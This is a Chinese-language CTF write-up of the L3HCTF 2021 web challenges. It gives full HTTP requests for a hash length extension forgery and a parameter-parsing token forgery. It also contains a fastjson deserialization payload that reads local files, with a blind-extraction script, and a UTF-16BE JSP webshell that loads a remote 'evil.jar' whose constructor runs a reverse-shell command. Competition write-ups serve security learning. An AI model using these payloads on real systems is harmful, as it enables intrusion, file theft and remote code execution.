0RAYS-L3HCTF2021 writeup-web
VSole2021-11-18 16:22:06
Easy PHP
頁面看起來沒毛病 復制一下就發現有問題
看響應包hex 再url編碼即可
GET /?username=admin&%e2%80%ae%e2%81%a6%4c%33%48%e2%81%a9%e2%81%a6%70%61%73%73%77%6f%72%64=%e2%80%ae%e2%81%a6%43%54%46%e2%81%a9%e2%81%a6%6c%33%68%63%74%66 HTTP/1.1Host: 124.71.176.131:10001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache
Image Service1
可以看到他人分享的鏈接
admin不可以 Admin成功
Image Service2
分析
可以發現flag2是模糊的
可以從該分享鏈接的參數中發現原因
http://121.36.209.245:10002/get?blur=20&text=secret&textsize=50&token=782dd8dd3be70e52374f188814b561cecb4a26350729d924d6606c918bc803bd&uuid=e19d069a-652a-471d-8c83-79010b5aaf66&x1=200&y1=200
blur=20 是控制模糊的參數
x1=200&y1=200 對圖片進行了裁切 只能看到圖片的一部分
text=secret 即為圖片經過高斯模糊后覆蓋的文字內容
因為在service會對請求參數與token校驗
所以應該要分析出token是怎么生成的,然后偽造token
程序
不會有web手不會用ida和gdb吧
ida打開 找到token函數 分析了一下 猜測會把 APP_SECRET 和所有請求參數拼接 然后sha256一下
但是這里看不出來如何拼接 拼接的格式
所以還是要動調
service和app都調了一下
拼接內容很容易就可以看出
大概如下
map[blur:[20] height:[1000] text:[] textcolor:[FFFFFF] textsize:[0] thumbnail:[false] uuid:[c314a3f2-1b14-40e6-8a9d-94acef8d1ac3] width:[1000] x0:[0] x1:[0] y0:[0] y1:[0]]
解法一 hash長度擴展攻擊
原理
hash長度擴展攻擊的基本場景:
網上很多講的很難理解
簡單來說 已知 message 及 hash(secret_key+message)
那么通過這種攻擊手段 可以構造得到 message+一些奇怪的字符+自定義字符 及 hash(secret_key+message+一些奇怪的字符+自定義字符)
實際場景可能比較復雜 可能涉及到一些解析漏洞等,但是原理就是上面的
工具
hash_extender
輸入
- data 對應 message的
- signature 對應 hash(secret_key+message)
- secret 對應 secret_key的長度
- append 對應 自定義字符
./hash_extender --data "map[blur:[20] text:[secret] textsize:[50] uuid:[b9bf1a78-ae0e-4b44-85f0-e1f07ede0165] x1:[200] y1:[200]]" --secret 16 --append "] textcolor:[FFFFFF] textsize:[0] uuid:[b9bf1a78-ae0e-4b44-85f0-e1f07ede0165] x1:[1000] y1:[1000]]" --signature "6332c92d31ee3effa8185d11035bdcaace30d3dbc8a937a38b8276f478fac740" --format sha256
輸出
- New signature 對應 hash(secret_key+message+一些奇怪的字符+自定義字符)
- New string 對應 message+一些奇怪的字符+自定義字符
Type: sha256Secret length: 16New signature: 11e37f66cbaba0d326359dca220ce44c3a1895adf5eb8a73900a4f68ce4588c8New string: 6d61705b626c75723a5b32305d20746578743a5b7365637265745d207465787473697a653a5b35305d20757569643a5b62396266316137382d616530652d346234342d383566302d6531663037656465303136355d2078313a5b3230305d2079313a5b3230305d5d8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003c05d2074657874636f6c6f723a5b4646464646465d207465787473697a653a5b305d20757569643a5b62396266316137382d616530652d346234342d383566302d6531663037656465303136355d2078313a5b313030305d2079313a5b313030305d5d
做題
根據上面的對應關系 使用工具
./hash_extender --data "map[blur:[20] text:[secret] textsize:[50] uuid:[b9bf1a78-ae0e-4b44-85f0-e1f07ede0165] x1:[200] y1:[200]]" --secret 16 --append "] textcolor:[FFFFFF] textsize:[0] uuid:[b9bf1a78-ae0e-4b44-85f0-e1f07ede0165] x1:[1000] y1:[1000]]" --signature "6332c92d31ee3effa8185d11035bdcaace30d3dbc8a937a38b8276f478fac740" --format sha256
生成的內容 改一下請求再發包即可
GET /get?blur=20&text=secret]+textsize%3a[50]+uuid%3a[b9bf1a78-ae0e-4b44-85f0-e1f07ede0165]+x1%3a[200]+y1%3a[200]]%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%c0&textcolor=FFFFFF&textsize=0&token=11e37f66cbaba0d326359dca220ce44c3a1895adf5eb8a73900a4f68ce4588c8&uuid=b9bf1a78-ae0e-4b44-85f0-e1f07ede0165&x1=1000&y1=1000 HTTP/1.1Host: 121.36.209.245:10002User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
構造上稍微需要一些技巧
此種解法無法獲取清晰的flag 無法去掉blur參數 所以最后只能硬看flag
解法二 直接構造
此種解法來自與ha1師傅賽后討論 ha1yyds
借助題目生成token,再配合一下解析漏洞,此處的構造十分巧妙
flag2 uuid 3859089e-67cb-444d-9dfd-9c4b91b2f6c0自己圖片 uuid a4bf20a9-9b29-47db-87cd-57b384bf8f9e
生成share
POST /api/share/new HTTP/1.1Host: 121.36.209.245:10001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------20510454632674357453543241695Content-Length: 364Origin: http://121.36.209.245:10001Connection: closeReferer: http://121.36.209.245:10001/shareCookie: session=MTYzNzAyNDgwMXxEdi1CQkFFQ180SUFBUkFCRUFBQUhQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUVkV2x1ZEFZQ0FBST18Sf7Kozgbni82LyMsTGy7ATR6aY5RaG1_aexev9UqkAw= -----------------------------20510454632674357453543241695Content-Disposition: form-data; name="text" 233] uuid:[3859089e-67cb-444d-9dfd-9c4b91b2f6c0 -----------------------------20510454632674357453543241695Content-Disposition: form-data; name="uuid" a4bf20a9-9b29-47db-87cd-57b384bf8f9e-----------------------------20510454632674357453543241695--
那么在后端hash的內容為
map[text:[233] uuid:[3859089e-67cb-444d-9dfd-9c4b91b2f6c0 ] uuid:[a4bf20a9-9b29-47db-87cd-57b384bf8f9e]]
題目返回token
0b13728c6840122a52fa9ccd63838d1e847b4d7fccd0000414d38c42c2d33c21
此處構造與share原文一樣的payload(后端拼接后與上面share拼接后的一樣),獲取圖片,就能看到很清晰的flag了
/get?text=233&uuid=3859089e-67cb-444d-9dfd-9c4b91b2f6c0&uuid=]+uuid%3a[a4bf20a9-9b29-47db-87cd-57b384bf8f9e&token=0b13728c6840122a52fa9ccd63838d1e847b4d7fccd0000414d38c42c2d33c21
cover
弱口令登錄admin admin
有fastjson。打fastjson
原理請看
https://mp.weixin.qq.com/s/BRBcRtsg2PDGeSCbHKc0fg
{ "abc": { "@type": "java.lang.AutoCloseable", "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": { "@type": "org.apache.commons.io.input.ReaderInputStream", "reader": { "@type": "jdk.nashorn.api.scripting.URLReader", "url": "file:///D:/1.txt" }, "charsetName": "UTF-8", "bufferSize": 1024 }, "boms": [{ "charsetName": "UTF-8", "bytes": [66] }] }, "address": { "$ref": "$.abc.BOM" }}
文章中的payload是這樣的,我們給他外面套上一層
[{"password":{"abc":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":"file:///flag"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"charsetName":"UTF-8","bytes":[76]}]},"address":{"$ref":"$.abc.BOM"}}}]
這樣就有回顯了。根據回顯盲注出flag
import requestssession = requests.session()burp0_url = "http://124.71.173.23:8088/dynamic_table"burp0_cookies = {"JSESSIONID": "129453A7ADA22FE7EFCA43989BBD7DB3"}burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://124.71.173.23:8088", "Connection": "close", "Referer": "http://124.71.173.23:8088/dynamic_table", "Upgrade-Insecure-Requests": "1"}lllll = ['76']proxies = { "http": "http://127.0.0.1:8084", "https": "http://127.0.0.1:8084"}for i in range(45): for j in range(32, 127): burp0_data = { "data": "[{\"password\":{\"abc\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.BOMInputStream\",\"delegate\":{\"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\"reader\":{\"@type\":\"jdk.nashorn.api.scripting.URLReader\",\"url\":\"file:///flag\"},\"charsetName\":\"UTF-8\",\"bufferSize\":1024},\"boms\":[{\"charsetName\":\"UTF-8\",\"bytes\":[" + ",".join( lllll)+','+str(j)+"]}]},\"address\":{\"$ref\":\"$.abc.BOM\"}}}]"} r = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,proxies=proxies) if "charsetName" in r.text: print(chr(j),end='') lllll.append(str(j))
bypass
jsp文件上傳,不能上傳可見字符。這里隨便一種編碼就行,比如UTF-16BE編碼。
https://github.com/threedr3am/JSP-Webshells/blob/master/jsp/10/README.md
把這里的代碼修改一下,只留下關鍵代碼,來繞過waf。
上傳jsp,雙寫繞后綴
shell.jsjspp
<%@ page language="java" pageEncoding="UTF-16BE" %><%@ page import="java.util.Iterator" %><%@ page import="java.util.ServiceLoader" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><% Class clazz = Class.forName("javax.script.ScriptEng"+"ineFactory"); Iterator serviceLoader = ServiceLoader.load(clazz, new URLClassLoader(new URL[]{new URL("http://ip:port/evil.jar")})).iterator(); while (serviceLoader.hasNext()){ serviceLoader.next(); }%>
evil中
EvilScript.java
import java.io.BufferedReader;import java.io.File;import java.io.InputStream;import java.io.InputStreamReader;import java.nio.file.Files;import java.nio.file.Paths;import java.util.List;import javax.script.ScriptEngine;import javax.script.ScriptEngineFactory;
public class EvilScript implements ScriptEngineFactory {
public EvilScript() throws Throwable { StringBuilder stringBuilder = new StringBuilder(); try { Runtime.getRuntime().exec("反彈shell命令"); } catch (Throwable e) { e.printStackTrace(); } throw new Throwable(stringBuilder.toString()); }
@Override public String getEngineName() { return null; }
@Override public String getEngineVersion() { return null; }
@Override public List<String> getExtensions() { return null; }
@Override public List<String> getMimeTypes() { return null; }
@Override public List<String> getNames() { return null; }
@Override public String getLanguageName() { return null; }
@Override public String getLanguageVersion() { return null; }
@Override public Object getParameter(String key) { return null; }
@Override public String getMethodCallSyntax(String obj, String m, String... args) { return null; }
@Override public String getOutputStatement(String toDisplay) { return null; }
@Override public String getProgram(String... statements) { return null; }
@Override public ScriptEngine getScriptEngine() { return null; }}
打包
javac EvilScript.javajar -cvf evil.jar META-INF EvilScript.class
jar包結構
上傳后訪問jsp,反彈shell
VSole
網絡安全專家